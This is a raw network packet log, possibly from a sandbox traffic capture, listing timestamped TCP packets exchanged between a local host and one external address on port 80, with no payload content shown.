Jun 5, 2024 18:28:36.951018095 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951018095 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951045036 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951056957 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951071024 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951073885 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951087952 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951098919 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951100111 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951122999 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951169014 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951180935 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951193094 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951195955 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951203108 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951215982 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951220036 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951230049 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951241970 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951261044 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951281071 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951297045 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951303959 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951308966 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951318979 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951338053 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951348066 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951356888 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951364040 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951370001 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951385975 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951447964 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951459885 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951466084 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951472044 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951488018 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951488018 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951498985 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951507092 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951508999 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951517105 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951520920 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951579094 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951579094 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951611996 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951622963 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951632977 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951643944 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951659918 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951663017 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951672077 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951680899 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951683998 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951698065 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951709032 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951714039 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951714039 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951720953 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951730967 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951740980 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951751947 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951757908 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951771021 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951773882 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951785088 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951793909 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951819897 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951819897 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.951952934 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.951965094 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952089071 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.952117920 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952127934 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952137947 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952148914 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952159882 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952159882 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.952172995 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952184916 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952188015 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952194929 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.952198029 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952207088 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952208042 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.952218056 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952228069 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.952238083 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.952289104 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952294111 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952316999 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.952368975 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952420950 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.952420950 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.952445984 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952457905 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952476978 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952528000 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.952528000 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.952563047 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952641010 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952660084 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952713966 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952713966 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.952714920 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.952725887 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952752113 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952781916 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.952789068 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952812910 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.952867985 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952881098 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.952896118 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.952920914 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.952999115 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.953166962 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.953186035 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.953233004 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.953233004 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.953255892 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.953318119 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.953339100 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.953342915 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.953381062 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.953381062 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.953403950 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.953458071 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.953481913 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.953558922 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.953582048 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.953641891 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.953768015 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.953813076 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.953818083 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.953870058 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954026937 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.954098940 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954117060 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954128027 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954170942 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954185009 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.954185009 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.954227924 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.954253912 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954271078 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954282045 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954298019 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954303026 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954304934 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.954308033 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954336882 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.954344034 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954375982 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.954463005 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954473019 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954483986 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.954483986 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954494953 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954507113 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954516888 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.954586029 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.954587936 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954608917 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954619884 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954657078 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954679966 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.954739094 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954761028 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954763889 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.954777002 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954782009 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954798937 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.954842091 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954864979 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.954886913 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.954895973 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954932928 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954953909 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.954977036 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.955034018 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.955039978 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.955107927 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.955204010 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.955347061 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.955451965 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.955507040 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.955559969 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.955570936 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.955638885 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.955705881 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.955785036 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.955930948 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.956017017 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.956177950 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.956203938 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.956224918 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.956240892 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.956336975 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.956367016 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.956473112 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.956495047 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.956600904 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.956602097 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.956609011 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.956743956 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.956757069 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.956808090 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.956819057 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.956829071 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.956896067 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.956908941 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.956942081 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.956952095 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.956964016 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.956976891 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.957061052 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.957078934 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.957091093 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.957102060 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.957211018 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.957326889 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.957340956 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.957534075 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.957668066 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.957679987 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.957690954 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.957696915 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.957709074 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.957760096 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.957775116 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.957808971 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.957853079 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.957864046 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.957942963 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958013058 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958049059 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958105087 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958185911 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958264112 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958275080 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958291054 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958409071 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958420992 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958497047 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958507061 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958517075 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958528042 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958539009 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958544970 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958559036 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958615065 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958626986 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958693027 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958719969 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958739996 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958749056 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.958762884 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958777905 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.958785057 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958785057 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.958806038 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958831072 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958832979 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.958832979 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.958842993 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958872080 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.958873987 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.958900928 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.958956957 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.958961010 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.959098101 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.959108114 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.959187984 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.959197044 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.959208012 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.959219933 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.959243059 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.959294081 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.959305048 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.959322929 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.959333897 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.959342003 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.959372044 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.959372044 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.959412098 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.959441900 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.959460974 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.959528923 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.959537029 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.959563017 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.959566116 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.959624052 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.959664106 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.959691048 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.959691048 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.959722042 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.959743023 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.959744930 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.959768057 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.959784985 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.959800959 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.959846020 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.959853888 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.959877968 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.959899902 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.959914923 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.959934950 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.959938049 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.959960938 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.959995985 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960007906 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960016966 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960019112 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.960036993 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.960036993 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960042000 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960073948 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.960095882 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960120916 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.960138083 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.960160017 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960175991 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960186005 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960197926 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960211992 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960216045 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960221052 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.960253954 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.960253954 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.960273981 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960314989 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960325003 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960366964 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.960380077 CEST	49731	80	192.168.2.7	2.56.245.142
